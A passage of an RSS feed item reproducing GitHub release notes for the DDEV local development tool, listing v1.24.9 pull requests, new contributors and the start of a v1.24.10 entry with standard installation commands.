<li>fix: don't output debug or verbose in middle of doing json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3538113729" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7739" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7739/hovercard" href="https://github.com/ddev/ddev/pull/7739">#7739</a></li>
<li>feat(projectname): Allow defaulting to not setting name in config.yaml, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3442760295" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7648" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7648/hovercard" href="https://github.com/ddev/ddev/issues/7648">#7648</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530266952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7719" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7719/hovercard" href="https://github.com/ddev/ddev/pull/7719">#7719</a></li>
<li>ci(github-runner): use jlumbroso/free-disk-space action for cleanup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541300597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7744" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7744/hovercard" href="https://github.com/ddev/ddev/pull/7744">#7744</a></li>
<li>docs: Update postgres:18 in configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3542901917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7748" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7748/hovercard" href="https://github.com/ddev/ddev/pull/7748">#7748</a></li>
<li>style: add dark mode support for images/ddev-logo.svg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3545565065" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7752" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7752/hovercard" href="https://github.com/ddev/ddev/pull/7752">#7752</a></li>
<li>fix: Add healthcheck to xhgui image to resolve TestCmdXhgui intermittent failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541461422" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7745" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7745/hovercard" href="https://github.com/ddev/ddev/pull/7745">#7745</a></li>
<li>ci: run Linux tests separately, not in matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3542209899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7746" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7746/hovercard" href="https://github.com/ddev/ddev/pull/7746">#7746</a></li>
<li>feat(debug): show logs on error for all containers, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537552248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7736" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7736/hovercard" href="https://github.com/ddev/ddev/pull/7736">#7736</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544852702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7751" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7751/hovercard" href="https://github.com/ddev/ddev/pull/7751">#7751</a></li>
<li>test: Fix TestConfigValidate for TYPO3 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544373647" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7750" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7750/hovercard" href="https://github.com/ddev/ddev/pull/7750">#7750</a></li>
<li>feat: enable non-interactive mode for CI or non-tty environments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541024448" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7743" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7743/hovercard" href="https://github.com/ddev/ddev/pull/7743">#7743</a></li>
<li>test(apache-fpm): don't run tests with TYPO3, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3544373647" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7750" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7750/hovercard" href="https://github.com/ddev/ddev/pull/7750">#7750</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548111606" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7755" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7755/hovercard" href="https://github.com/ddev/ddev/pull/7755">#7755</a></li>
<li>ci: sort golang imports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548210416" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7756" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7756/hovercard" href="https://github.com/ddev/ddev/pull/7756">#7756</a></li>
<li>ci(pull-push-providers): don't load 1Password secrets if env is empty by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548299986" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7757" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7757/hovercard" href="https://github.com/ddev/ddev/pull/7757">#7757</a></li>
<li>build(deps): bump actions/upload-artifact from 4 to 5 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3557397387" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7767" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7767/hovercard" href="https://github.com/ddev/ddev/pull/7767">#7767</a></li>
<li>chore(provider): remove trailing whitespace in YAML files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RobLoach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RobLoach">@RobLoach</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3562731610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7770" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7770/hovercard" href="https://github.com/ddev/ddev/pull/7770">#7770</a></li>
<li>feat: use composer_root in cakephp, craftcms, laravel, magento2, shopware6, symfony for app type detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352287272" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7558" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7558/hovercard" href="https://github.com/ddev/ddev/pull/7558">#7558</a></li>
<li>docs(docker-compose): improve mkcert install, how to add container user, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3510988124" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7709" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7709/hovercard" href="https://github.com/ddev/ddev/issues/7709">#7709</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3561208003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7769" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7769/hovercard" href="https://github.com/ddev/ddev/pull/7769">#7769</a></li>
<li>docs: remove duplicate TYPO3 quickstart tab, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552537945" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7763" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7763/hovercard" href="https://github.com/ddev/ddev/issues/7763">#7763</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552547226" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7764" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7764/hovercard" href="https://github.com/ddev/ddev/pull/7764">#7764</a></li>
<li>feat(describe): add ability to add custom info per service, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1966601560" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5469" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5469/hovercard" href="https://github.com/ddev/ddev/issues/5469">#5469</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530868809" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7723" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7723/hovercard" href="https://github.com/ddev/ddev/pull/7723">#7723</a></li>
<li>docs: migrate Vite Setup documentation into DDEV docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3245718672" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7466" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7466/hovercard" href="https://github.com/ddev/ddev/issues/7466">#7466</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419749017" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7625" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7625/hovercard" href="https://github.com/ddev/ddev/pull/7625">#7625</a></li>
<li>feat(upsun): use existing config instead of requiring environment variables [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3545696148" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7753" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7753/hovercard" href="https://github.com/ddev/ddev/pull/7753">#7753</a></li>
<li>docs(quickstart): Improve quickstarts to resolve problems with copy/paste by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3552907495" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7765" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7765/hovercard" href="https://github.com/ddev/ddev/pull/7765">#7765</a></li>
<li>fix: improve username sanitization and add fallback handling, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3538080538" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7738" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7738/hovercard" href="https://github.com/ddev/ddev/issues/7738">#7738</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3540967315" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7742" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7742/hovercard" href="https://github.com/ddev/ddev/pull/7742">#7742</a></li>
<li>feat(diagnose): ddev utility diagnose feature, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2449046299" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6461" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6461/hovercard" href="https://github.com/ddev/ddev/issues/6461">#6461</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530377767" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7720" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7720/hovercard" href="https://github.com/ddev/ddev/pull/7720">#7720</a></li>
<li>docs: ignore drupal.org link 403'd by drupal [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572764587" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7772" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7772/hovercard" href="https://github.com/ddev/ddev/pull/7772">#7772</a></li>
<li>feat: add initial partial php8.5 support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488160347" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7697" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7697/hovercard" href="https://github.com/ddev/ddev/pull/7697">#7697</a></li>
<li>fix: use one.one.one.one to detect internet working by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572365705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7771" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7771/hovercard" href="https://github.com/ddev/ddev/pull/7771">#7771</a></li>
<li>test: use testcommon.CopyGlobalDdevDir to fix intermittent failures in TestCmdXHGui by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3551132191" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7761" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7761/hovercard" href="https://github.com/ddev/ddev/pull/7761">#7761</a></li>
<li>fix(debug): display offline warning only on <code>ddev start</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572365705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7771" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7771/hovercard" href="https://github.com/ddev/ddev/pull/7771">#7771</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3574835130" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7774" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7774/hovercard" href="https://github.com/ddev/ddev/pull/7774">#7774</a></li>
<li>fix(postgres): run as container user instead of uid 999 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3553862720" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7766" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7766/hovercard" href="https://github.com/ddev/ddev/pull/7766">#7766</a></li>
<li>feat: Add pre-share and post-share hooks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1741512164" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4962" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4962/hovercard" href="https://github.com/ddev/ddev/issues/4962">#4962</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3575533921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7777" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7777/hovercard" href="https://github.com/ddev/ddev/pull/7777">#7777</a></li>
<li>fix: add blackfire-php reconfiguration for older PHP versions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3576230118" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-platformsh/issues/142" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-platformsh/issues/142/hovercard" href="https://github.com/ddev/ddev-platformsh/issues/142">ddev/ddev-platformsh#142</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3577886976" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7778" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7778/hovercard" href="https://github.com/ddev/ddev/pull/7778">#7778</a></li>
<li>fix(describe): show service info when project is stopped, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955682508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7159" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7159/hovercard" href="https://github.com/ddev/ddev/issues/7159">#7159</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558374247" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7768" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7768/hovercard" href="https://github.com/ddev/ddev/pull/7768">#7768</a></li>
<li>build: bump docker-compose to v2.40.3, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470383991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7678" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7678/hovercard" href="https://github.com/ddev/ddev/issues/7678">#7678</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3577898753" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7779" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7779/hovercard" href="https://github.com/ddev/ddev/pull/7779">#7779</a></li>
<li>docs: add crosslink for shortened DDEV env variables to full list, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578440372" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7781" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7781/hovercard" href="https://github.com/ddev/ddev/issues/7781">#7781</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garvinhicking/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garvinhicking">@garvinhicking</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578442491" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7782" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7782/hovercard" href="https://github.com/ddev/ddev/pull/7782">#7782</a></li>
<li>test(quickstart): add disk cleanup before running tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578684092" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7783" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7783/hovercard" href="https://github.com/ddev/ddev/pull/7783">#7783</a></li>
<li>build(docker): bump images to v1.24.9 for release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3578172220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7780" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7780/hovercard" href="https://github.com/ddev/ddev/pull/7780">#7780</a></li>
<li>docs(sponsor-banner): add link to sustainability article by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3582394761" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7788" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7788/hovercard" href="https://github.com/ddev/ddev/pull/7788">#7788</a></li>
<li>fix(self-upgrade): add docs for updating ddev package only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3581678925" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7785" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7785/hovercard" href="https://github.com/ddev/ddev/issues/7785">#7785</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3582289589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7787" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7787/hovercard" href="https://github.com/ddev/ddev/pull/7787">#7787</a></li>
<li>docs(commands): organize utility commands in alphabetical order, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477852641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7685" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7685/hovercard" href="https://github.com/ddev/ddev/pull/7685">#7685</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3583571582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7789" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7789/hovercard" href="https://github.com/ddev/ddev/pull/7789">#7789</a></li>
<li>feat: add user flag for ssh/exec/hooks and x-ddev.ssh-shell for ssh, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3097474435" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7339" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7339/hovercard" href="https://github.com/ddev/ddev/issues/7339">#7339</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3581970487" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7786" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7786/hovercard" href="https://github.com/ddev/ddev/pull/7786">#7786</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ara303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ara303">@ara303</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432583948" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7639" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7639/hovercard" href="https://github.com/ddev/ddev/pull/7639">#7639</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469596003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7677" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7677/hovercard" href="https://github.com/ddev/ddev/pull/7677">#7677</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JshGrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JshGrn">@JshGrn</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536973192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7733" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7733/hovercard" href="https://github.com/ddev/ddev/pull/7733">#7733</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.8...v1.24.9"><tt>v1.24.8...v1.24.9</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.10]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.10.exe;...]]></description>
<link>https://tsecurity.de/de/3497298/downloads/v12410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497298/downloads/v12410/</guid>
<pubDate>Thu, 07 May 2026 22:17:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
